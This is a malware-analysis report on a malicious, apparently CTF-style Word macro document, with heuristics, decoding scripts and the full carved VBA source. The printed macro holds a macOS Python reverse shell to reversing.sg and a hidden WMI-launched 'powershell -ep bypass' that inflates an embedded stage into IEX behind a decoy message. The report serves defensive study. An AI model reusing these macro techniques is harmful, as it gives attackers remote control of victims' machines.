Verdict: MALICIOUS (risk score 600)

Malware Insights

MITRE ATT&CK:
- T1059.001 PowerShell
- T1059.005 Visual Basic
- T1105 Ingress Tool Transfer
- T1204.002 Malicious File
The sample's VBA branches on the host OS in Document_Open (an InStr check of Application.System.OperatingSystem for "Macintosh"). On macOS, C64() calls MacScript("do shell script ...") to run a Python one-liner that opens a TCP socket, dup2()s it over stdin/stdout/stderr and spawns /bin/sh -i, a classic reverse shell; as written it cannot work, because it imports urllib2 (Python 2 only) and passes the literal 'http://reversing.sg/fl4g.txt' as the connect() hostname. On Windows, MainWin() obtains Win32_Process through the winmgmts: moniker (GetObject, not Shell()) and calls .Create with a Win32_ProcessStartup whose ShowWindow is 0, so `powershell -ep bypass -C ...` starts without a visible window. That command is assembled from concatenated string fragments and carries its second stage inline: a base64 blob (beginning H4sI, the base64 form of the gzip magic 1f 8b 08) is decoded, inflated through GZipStream and passed to IEX. No download occurs in this branch. MainWin() then blanks the document body and writes "File is really corrupted." as a decoy. Separately, UserForm1's button handler uses CreateObject("MSXML2.ServerXMLHTTP") to GET http://enablemacroses.com and feeds the response body as the key to ourseahorse(), an RC4 implementation that discards the first 3072 keystream bytes, over the text box contents, comparing the result with a hard-coded byte list. The concatenation-built PowerShell command, the embedded compressed stage and the hidden WMI launch are what support the dropper classification; the embedded URLs are a reverse-shell target and a key source, not payload locations.
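The MainWin() chain (base64, then gzip, then IEX) can be unwrapped statically. The script below is an added example, not code from the report or from the sample: it reassembles the `lStr = lStr & "..."` fragments, extracts the FromBase64String('...') argument, confirms the gzip magic (the sample's blob begins with H4sI, which decodes to 1f 8b 08) and inflates it, so the second stage can be read without PowerShell or IEX ever running. The `build_sample_vba` input is constructed for the demonstration and is not the sample's real blob; to use the decoder on the real sample, point it at the carved macros.bas.

```python
"""Static unwrapping of the MainWin() PowerShell stage (added example, not the
report's or the sample's code): reassemble the lStr fragments, pull the
FromBase64String('...') argument, confirm the gzip magic and inflate it.
Nothing is executed; IEX is never reached."""
import base64
import binascii
import gzip
import re
import sys

GZIP_MAGIC = b"\x1f\x8b"          # base64 'H4sI' decodes to 1f 8b 08, the prefix seen in the sample
B64_ARG = re.compile(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)")


def join_vba_concat(vba_src: str, var: str = "lStr") -> str:
    """Concatenate every `var = var & fragment` line in source order.
    A doubled quote inside a VBA literal is an escaped quote and is collapsed to one."""
    v = re.escape(var)
    pat = re.compile(rf'^\s*{v}\s*=\s*{v}\s*&\s*"(.*)"\s*$', re.MULTILINE)
    return "".join(m.group(1).replace('""', '"') for m in pat.finditer(vba_src))


def looks_like_gzip_b64(b64: str) -> bool:
    """Cheap triage check: does the base64 text start with a gzip member?"""
    head = b64[:8]
    try:
        raw = base64.b64decode(head + "=" * (-len(head) % 4))
    except binascii.Error:
        return False
    return raw[:2] == GZIP_MAGIC


def decode_stage(ps_cmd: str) -> str:
    """Return the plaintext the sample would hand to IEX."""
    m = B64_ARG.search(ps_cmd)
    if not m:
        raise ValueError("no FromBase64String('...') argument in the command")
    raw = base64.b64decode(m.group(1))
    if raw[:2] != GZIP_MAGIC:
        raise ValueError("blob is not gzip; look for a different unwrapping step in the command")
    return gzip.decompress(raw).decode("utf-8")


def build_sample_vba(stage: str, chunk: int = 100) -> str:
    """Constructed input mimicking the macro's layout: base64(gzip(stage)) split
    across `lStr = lStr & ...` lines. This is NOT the sample's real blob."""
    blob = base64.b64encode(gzip.compress(stage.encode("utf-8"))).decode("ascii")
    ps = ("powershell -ep bypass -C \"$data = [System.Convert]::FromBase64String('" + blob + "');"
          "$ms=New-Object System.IO.MemoryStream;$ms.Write($data,0,$data.Length);$ms.Seek(0,0)|Out-Null;"
          "$cs = New-Object System.IO.Compression.GZipStream($ms,[System.IO.Compression.CompressionMode]::Decompress);"
          "$sr=New-Object System.IO.StreamReader($cs);$t=$sr.readtoend();IEX $t;\"")
    pieces = [ps[i:i + chunk] for i in range(0, len(ps), chunk)]
    lines = ['lStr = ""'] + ['lStr = lStr & "' + p.replace('"', '""') + '"' for p in pieces]
    return "\n".join(lines)


if __name__ == "__main__":
    # Usage: python unwrap_stage.py macros.bas   (falls back to the constructed sample)
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            src = fh.read()
    else:
        src = build_sample_vba("Write-Host 'constructed second stage'")
    cmd = join_vba_concat(src)
    print("command prefix:", cmd[:80])
    print("gzip magic present:", looks_like_gzip_b64(B64_ARG.search(cmd).group(1)))
    print("decoded stage:\n" + decode_stage(cmd))
```

The magic check matters in practice: if a variant swaps GZipStream for DeflateStream or adds an XOR pass, `decode_stage` refuses rather than returning garbage, which is the cue to read the rest of the command for the real unwrapping step.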
Heuristics (17)

- VBA macros detected (medium; OLE_VBA_MACROS; 10 related findings): Document contains VBA macro code.
- Potential Shell call in VBA (critical; OLE_VBA_SHELL). Matched line in script:
  `Err.Clear scriptToRun = "do shell script ""python -c 'import urllib2,socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\""http://reversing.sg/fl4g.txt\"",80)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\""/bin/sh\"",\""-i\""]);' &""" res = MacScript(scriptToRun)`
  The sink here is MacScript("do shell script ..."), the macOS counterpart of Shell(); the Windows branch launches through WMI instead (see OLE_VBA_WMI_PROCESS_CREATE).
- PowerShell reference in VBA (critical; OLE_VBA_PS). Matched line in script:
  `lStr = "" lStr = lStr & "powershell -ep bypass -C ""$data = [System.Convert]::FromBase64String('H4sIAAAAAAAEAEWPYUvDMBCGvwv+h1EKS8DFoU5wozBsN+eQFZ1MaGehS88ZSRNIb12z0f9u0KEf733ufY7zj1kvawOfpK/QIJsorguhtu/DYV5xIdgD4BKNS0gaalWDQYemRpf3eQW3NyfWzWcvfR7p+ul6LotyZfmV3CV2cEjsXbSa6Dopm08392H2HHQppaPzM/+oWey1QfoYs0gY4KiNdXJ3MdwZAwr/UvK7vybjbEwv28A7ddcfMt8ybNBznCxg34s3X67SWdoKoWQLQPYGm1AKZ6Ms0nsldV5MhQTi/zx+0fnX0tE31FlVnA0BAAA=');$ms=New-Object System.IO.MemoryStream;$" lStr = lStr & "ms.Write($data,0,$data.Length);$ms.Seek(0,0)|Out-Null;$cs = New-Object System.IO.Compression.GZipStr"`
- Obfuscated VBA Shell command with URL (critical; OLE_VBA_OBFUSCATED_SHELL_URL): VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own. Matched line in script: the same C64 `scriptToRun = "do shell script ... MacScript(scriptToRun)` line quoted under OLE_VBA_SHELL.
- VBA WMI Win32_Process launcher (critical; OLE_VBA_WMI_PROCESS_CREATE): VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions. Matched line in script:
  `strComputer = "." Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")`
  In this sample the class name is not hidden: MainWin() binds `winmgmts:\\.\root\cimv2:Win32_Process` directly and calls `objProcess.Create lStr, Null, objConfig, intProcessID` with a Win32_ProcessStartup whose ShowWindow is 0, so the PowerShell process starts without a visible window.
- VBA injects an Excel-4 macro CALL to a download/exec API (critical; OLE_VBA_XLM_CALL_INJECTION): VBA writes Excel-4 (XLM) =CALL() formulas targeting urlmon URLDownloadToFile / Shell32 ShellExecute and runs them. This VBA-to-XLM bridge downloads and executes a payload while keeping the API names out of normal VBA keyword scanning. Matched line in script: the same C64 MacScript line quoted under OLE_VBA_SHELL.
  Caveat: that line contains no =CALL() formula, URLDownloadToFile or ShellExecute, and neither does the rest of the recovered source; this is a Word document (ThisDocument, ActiveDocument, wdCharacter), not a workbook. Treat the finding as a matcher false positive rather than as evidence of an XLM bridge.
- CreateObject call (high; OLE_VBA_CREATEOBJ). Matched line in script:
  `Set oXMLHTTP = CreateObject("MSXML2.ServerXMLHTTP") oXMLHTTP.Open "GET", sURL, False`
  This is the UserForm1 button handler fetching http://enablemacroses.com, whose response body is used as a key; it is not the process launcher.
- GetObject call (high; OLE_VBA_GETOBJ). Matched line in script:
  `strComputer = "." Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")`
- VBA p-code auto-exec with execution tokens (high; OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low; OLE_VBA_AUTOOPEN). Matched line in script:
  `Attribute VB_Name = "AutoOpen" Sub Main()`
  "AutoOpen" is the name of a module containing Sub Main(), which shows UserForm1; Word also runs Sub Main() in a module named AutoOpen as an auto macro, so this is a second entry point beside Document_Open.
- Document_Open macro (low; OLE_VBA_DOCOPEN). Matched line in script:
  `Private Sub Document_Open() If InStr(1, Application.system.OperatingSystem, "Macintosh") <> 0 Then`
  This is the OS check that selects the macOS branch (C64) or the Windows branch (MainWin).
- Reference to PowerShell (high; SC_STR_POWERSHELL).
- Reference to Windows Script Host (high; SC_STR_WSCRIPT). Note: this string hit is not tied to a source line, and the recovered VBA contains no WScript/WSH reference.
- LOLBin token sequence in document text (high; SE_LOLBIN_RUN_COMMAND): Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, ...) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or, in macro-laden Office files, the macro's own string-pool entries appearing adjacent in extracted text.
- Legacy WordBasic auto-exec macro marker (medium; OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  Caveat: the "no modern VBA project was recovered" clause is contradicted by the extracted artifact below (macros.bas, 4995 bytes of decoded VBA source), so weigh this marker against the recovered project rather than as an independent finding.
- Suspicious extracted artifact (info; EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info; EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://enablemacroses.com (referenced by macro; fetched with MSXML2.ServerXMLHTTP in UserForm1.CommandButton1_Click, response used as the RC4 key)
  - http://reversing.sg/fl4g.txt\ (referenced by macro; the trailing backslash is the escape character preceding the closing quote in the VBA string, captured by the extractor)
  - http://reversing.sg/fl4g.txt (referenced by macro; the socket connect target in C64)
  - http://schemas.openxmlformats.org/drawingml/2006/main (referenced by macro; standard OOXML namespace, benign on its own)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4995 bytes |

SHA-256: 7a19d07537b0ac2a30198242f5d4b4aa973671c968474b1d1f5068b0781c0732

Detection: ClamAV: no threats found.
Obfuscation or payload: likely (carved artifact contains 1 long base64-like blob).

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If Mac Then
Private Declare PtrSafe Function system Lib "libc.dylib" (ByVal command As String) As LongPtr
Private Declare PtrSafe Function web_popen Lib "libc.dylib" Alias "popen" (ByVal command As String, ByVal mode As String) As LongPtr
Private Declare PtrSafe Function web_pclose Lib "libc.dylib" Alias "pclose" (ByVal file As LongPtr) As Long
Private Declare PtrSafe Function web_fread Lib "libc.dylib" Alias "fread" (ByVal outStr As String, ByVal size As LongPtr, ByVal items As LongPtr, ByVal stream As LongPtr) As Long
Private Declare PtrSafe Function web_feof Lib "libc.dylib" Alias "feof" (ByVal file As LongPtr) As LongPtr
#End If
Sub C64()
On Error Resume Next
Err.Clear
scriptToRun = "do shell script ""python -c 'import urllib2,socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\""http://reversing.sg/fl4g.txt\"",80)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\""/bin/sh\"",\""-i\""]);' &"""
res = MacScript(scriptToRun)
End Sub
Private Sub MainWin()
var_Filesize = FileLen(ActiveDocument.FullName)
Debug.Print var_Filesize
Const word = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = word
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
lStr = ""
lStr = lStr & "powershell -ep bypass -C ""$data = [System.Convert]::FromBase64String('H4sIAAAAAAAEAEWPYUvDMBCGvwv+h1EKS8DFoU5wozBsN+eQFZ1MaGehS88ZSRNIb12z0f9u0KEf733ufY7zj1kvawOfpK/QIJsorguhtu/DYV5xIdgD4BKNS0gaalWDQYemRpf3eQW3NyfWzWcvfR7p+ul6LotyZfmV3CV2cEjsXbSa6Dopm08392H2HHQppaPzM/+oWey1QfoYs0gY4KiNdXJ3MdwZAwr/UvK7vybjbEwv28A7ddcfMt8ybNBznCxg34s3X67SWdoKoWQLQPYGm1AKZ6Ms0nsldV5MhQTi/zx+0fnX0tE31FlVnA0BAAA=');$ms=New-Object System.IO.MemoryStream;$"
lStr = lStr & "ms.Write($data,0,$data.Length);$ms.Seek(0,0)|Out-Null;$cs = New-Object System.IO.Compression.GZipStr"
lStr = lStr & "eam($ms,[System.IO.Compression.CompressionMode]::Decompress);$sr=New-Object System.IO.StreamReader($"
lStr = lStr & "cs);$t=$sr.readtoend();IEX $t;"""
lStr = lStr & ""
objProcess.Create lStr, Null, objConfig, intProcessID
Selection.WholeStory
Selection.Delete Unit:=wdCharacter, Count:=1
Selection.TypeText text:="File is really corrupted."
End Sub
Private Sub Document_Open()
If InStr(1, Application.system.OperatingSystem, "Macintosh") <> 0 Then
C64
Else
MainWin
End If
End Sub
Attribute VB_Name = "AutoOpen"
Sub Main()
UserForm1.Show
End Sub
Function ourseahorse(sMessage, strKey)
Dim kLen, x, y, i, j, temp
Dim s(256), k(256)
kLen = Len(strKey)
For i = 0 To 255
s(i) = i
k(i) = Asc(Mid(strKey, (i Mod kLen) + 1, 1))
Next
j = 0
For i = 0 To 255
j = (j + k(i) + s(i)) Mod 256
temp = s(i)
s(i) = s(j)
s(j) = temp
Next
x = 0
y = 0
For i = 1 To 3072
x = (x + 1) Mod 256
y = (y + s(x)) Mod 256
temp = s(x)
s(x) = s(y)
s(y) = temp
Next
For i = 1 To Len(sMessage)
x = (x + 1) Mod 256
y = (y + s(x)) Mod 256
temp = s(x)
s(x) = s(y)
s(y) = temp
ourseahorse = ourseahorse & (s((s(x) + s(y)) Mod 256) Xor Asc(Mid(sMessage, i, 1))) & ","
Next
End Function
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{F51098F9-75CB-492F-BD84-8E5DB98D052E}{4E126C8E-97D1-4BF2-8103-65C958C48100}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
Dim oXMLHTTP As Object
Dim sPageHTML As String
Dim sURL As String
sURL = "http://enablemacroses.com"
Set oXMLHTTP = CreateObject("MSXML2.ServerXMLHTTP")
oXMLHTTP.Open "GET", sURL, False
oXMLHTTP.send
sKey = oXMLHTTP.responseText
sMessage = tbox.text
x = ourseahorse(sMessage, sKey)
y = "111,84,77,89,203,150,116,89,197,72,226,100,165,245,146,10,32,226,162,246,203,54,22,38,170,176,140,251,246,148,213,97,164,250,125,242,13,162,250,33,239,104,38,74,167,183,133,3,72,255,131,105,228,81,164,202,212,207,231,172,100,156,197,237,45,87,182,196,77,"
If x = y Then
MsgBox "Gratz"
Else
MsgBox "Try harder"
End If
End Sub
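UserForm1.CommandButton1_Click compares ourseahorse(input, key) with a hard-coded byte list, where the key is the HTTP body returned by http://enablemacroses.com. The routine shown above is RC4: the standard key schedule, a PRGA whose first 3072 output bytes are discarded (the `For i = 1 To 3072` loop), then one keystream byte XORed into each character, emitted as comma-separated decimals. The Python port below is an added example, not the sample's or the report's code, for reproducing the check offline; it assumes Asc() maps to Latin-1 code points and a non-empty key. The real key is served remotely and is not on the page, so the hard-coded list can only be inverted once that body is captured; the block therefore checks itself against the public RC4 test vector (key "Key", no drop) and a round trip with a constructed placeholder key.

```python
"""Python port of the macro's ourseahorse() routine (added example, not the
sample's code). It is RC4 with the first 3072 keystream bytes discarded, output
as '<byte>,<byte>,...,' exactly as compared against y in UserForm1."""

# Assumption: Asc() is treated as Latin-1 code points; the VBA result for
# non-ASCII characters depends on the system code page.
KEY_ENCODING = "latin-1"

# The hard-coded comparison string from UserForm1.CommandButton1_Click (69 values).
EXPECTED_Y = ("111,84,77,89,203,150,116,89,197,72,226,100,165,245,146,10,32,226,162,246,203,54,22,38,"
              "170,176,140,251,246,148,213,97,164,250,125,242,13,162,250,33,239,104,38,74,167,183,133,3,"
              "72,255,131,105,228,81,164,202,212,207,231,172,100,156,197,237,45,87,182,196,77,")


def rc4_keystream(key: bytes, drop: int = 3072):
    """Yield RC4 keystream bytes for `key`, skipping the first `drop` outputs."""
    if not key:
        raise ValueError("empty key: the VBA would fault on 'i Mod kLen' with kLen = 0")
    s = list(range(256))
    j = 0
    for i in range(256):                     # KSA: the first two loops of ourseahorse()
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    x = y = 0
    produced = 0
    while True:                              # PRGA: the 3072-iteration drop loop, then the message loop
        x = (x + 1) & 0xFF
        y = (y + s[x]) & 0xFF
        s[x], s[y] = s[y], s[x]
        produced += 1
        if produced > drop:
            yield s[(s[x] + s[y]) & 0xFF]


def keystream_prefix(key: bytes, n: int, drop: int = 3072) -> bytes:
    """First n keystream bytes after the drop (handy for known-answer checks)."""
    ks = rc4_keystream(key, drop)
    return bytes(next(ks) for _ in range(n))


def ourseahorse(message: str, key: str) -> str:
    """Same output format as the VBA function, including the trailing comma."""
    ks = rc4_keystream(key.encode(KEY_ENCODING))
    return "".join(f"{next(ks) ^ ord(ch)}," for ch in message)


def recover_plaintext(expected: str, key: str) -> str:
    """RC4 is symmetric: XOR the expected bytes with the same keystream to get
    the text the form would accept for that key."""
    values = [int(v) for v in expected.split(",") if v]
    ks = rc4_keystream(key.encode(KEY_ENCODING))
    return "".join(chr(v ^ next(ks)) for v in values)


def expected_value_count() -> int:
    """Length of the accepted input, readable from EXPECTED_Y without the key."""
    return len([v for v in EXPECTED_Y.split(",") if v])


if __name__ == "__main__":
    # The real key is the HTTP body of http://enablemacroses.com and is not on the page;
    # "constructed-key" is a placeholder used only to show the round trip.
    demo_key = "constructed-key"
    ct = ourseahorse("Try harder", demo_key)
    print(ct)
    print(recover_plaintext(ct, demo_key))
    print("accepted input length:", expected_value_count())
    # With a captured key: print(recover_plaintext(EXPECTED_Y, captured_body))
```

One detail worth keeping when porting: the VBA compares the two comma strings with `=`, so the input must be exactly 69 characters; a longer or shorter input changes the element count and can never match, whatever the key.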